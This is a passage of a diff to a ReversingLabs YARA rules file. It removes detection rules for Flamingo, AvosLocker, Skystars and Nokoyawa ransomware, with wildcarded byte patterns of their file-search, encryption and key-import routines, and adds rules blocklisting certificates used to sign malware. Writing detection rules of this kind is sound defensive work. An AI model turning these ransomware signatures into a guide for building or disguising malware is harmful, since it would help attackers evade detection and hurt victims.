+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "67:31:cb:14:30:f1:8b:8c:0c:43:ab:40:e1:15:41:69" and 1436313600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Flamingo : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Flamingo ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "333ef1f9-ac54-5a3d-9b2b-50483eeb93e1"
-		date = "2021-04-14"
-		modified = "2021-04-14"
+		id = "3d078c5d-e469-54f1-bd69-aebeec1c25f1"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Flamingo.yara#L1-L54"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16836-L16852"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "446c0d332af01c0fceb0356d5ab273eb55764869cc8343468b75625e5d4d1036"
+		logic_hash = "d6d0d5c86dd88afa29fb3c7cc3c0ab2e3401637a23e062ee9bab693a715cf16f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Flamingo"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
-            C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encrypt_files = {
-            68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
-            ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
-            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ??
-            C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ??
-            8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shan Feng" and pe.signatures [ i ] . serial == "15:95:05:e6:45:6b:9a:93:52:f7:c4:71:68:d8:9b:96" and 1469404800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Avoslocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AvosLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a803283d-6424-5a64-89e6-c73a3322ba1e"
-		date = "2021-10-22"
-		modified = "2021-10-22"
+		id = "c6ba359e-4883-534d-bc86-8c063e54c92f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.AvosLocker.yara#L1-L108"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16854-L16870"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4d81b801a95a54a35989c4a985d92578971568d1412f625bca911d0fa1eee1fe"
+		logic_hash = "ff2a2d06c48bd3426fa42526d966152e3e7166c4170b4e08bb65ee5d876eda93"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AvosLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
-            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
-            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
-            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
-        }
-		$enum_resources = {
-            50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 57
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7E
-            ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 39 46 ?? B9 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 8B D1 0F 45 56 ?? 8B C1 83
-            7E ?? ?? 0F 11 85 ?? ?? ?? ?? 0F 45 46 ?? 83 3E ?? 0F 28 05 ?? ?? ?? ?? 89 45 ?? 8B
-            C1 0F 45 06 83 7E ?? ?? 0F 11 45 ?? 89 45 ?? 8B C1 0F 28 05 ?? ?? ?? ?? 0F 45 46 ??
-            33 C9 0F 11 45 ?? 89 45 ?? 0F 28 05 ?? ?? ?? ?? 0F 11 45 ?? 8A 85 ?? ?? ?? ?? 30 84
-            0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 52 FF 75 ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? FF 75 ??
-            FF 75 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3E ?? 0F 84 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ??
-            59 83 F8 ?? 0F 86 ?? ?? ?? ?? 8B 06 80 78 ?? ?? 75 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 33 C0 66 C7 45 ?? ?? ?? C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ??
-            8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 FF 36 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 65 ?? ?? 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ??
-            C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 83 4D ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? EB ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8
-            ?? ?? ?? ?? 59 F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5D
-            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15
-        }
-		$import_key = {
-            50 53 53 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? FF D6 50 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B1 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 30 8C 05 ?? ??
-            ?? ?? 40 83 F8 ?? 73 ?? 8A 8D ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 59 0F 11 85 ?? ?? ?? ??
-            59 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 88 9D
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 88 9D ?? ?? ??
-            ?? FF D6 50 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 36 8D 45 ?? 89 9D ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? FF 76 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 83 C4 ?? 8B D7 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            84 C0 75 ?? 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7
-            85 ?? ?? ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83
-            F9 ?? 72 ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 59 8D 4D ?? 85 C0 74 ?? 88 19 41 83 E8 ?? 75 ?? 39 9D ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8
-        }
-		$encrypt_files = {
-            50 51 51 FF B5 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B BD ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CE 85 C0 74 ?? C6 01 ?? 41 83 E8 ?? 75 ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C0 ?? 74 ?? 39 85 ?? ?? ?? ?? 72 ?? 50 8D 85 ?? ?? ??
-            ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
-            C4 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 59 57 40 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 6A ?? FF B5 ?? ?? ?? ?? 6A
-            ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? D1 EF 6A ?? 5A 74 ??
-            8B 9D ?? ?? ?? ?? 4B 03 DE 8A 03 8A 0C 32 88 04 32 42 88 0B 4B 3B D7 72 ?? 8B 9D ??
-            ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 03 C3 56 50 E8 ?? ?? ?? ?? 03 DF 56
-            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 47 81 C6 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
-            B9 ?? ?? ?? ?? F7 F1 83 C4 ?? 40 3B F8 0F 82
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "04:a0:e9:2b:0b:9e:bb:b7:97:df:6e:f5:2b:d5:ad:05" and 1479081600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Skystars : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Skystars ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9dc19bda-c5bd-58fb-8c4f-a7d8a6fbbce9"
-		date = "2020-11-20"
-		modified = "2020-11-20"
+		id = "4458df2d-82c2-5377-9746-101c2de52913"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Skystars.yara#L1-L97"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16872-L16888"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "352d22183b0974908ce684725fe85b4714ac5959c3bddf093b54383195881a5a"
+		logic_hash = "2c6673f6821c4ba11fc015cf3e9edefeb7c45209bc9dcd18501c4681444a9b9e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Skystars"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50
-            6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB
-            74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D
-            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33
-        }
-		$search_files_p2 = {
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ??
-            ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
-            ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
-            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
-            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ??
-            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03
-            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68
-            ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
-            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 68 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
-            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
-            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$main_routine = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
-            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50
-            E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 89 45
-            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ??
-            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeroscan TOV" and pe.signatures [ i ] . serial == "25:f2:22:ab:26:13:dc:42:70:b2:aa:bc:25:19:a1:01" and 1445299200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Nokoyawa : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Nokoyawa ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "31470ce4-381f-50d2-bbca-03c592e62a7d"
-		date = "2022-06-06"
-		modified = "2022-06-06"
+		id = "b433cddc-25c3-5627-99b5-ff9bc7fa73ed"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Nokoyawa.yara#L1-L104"
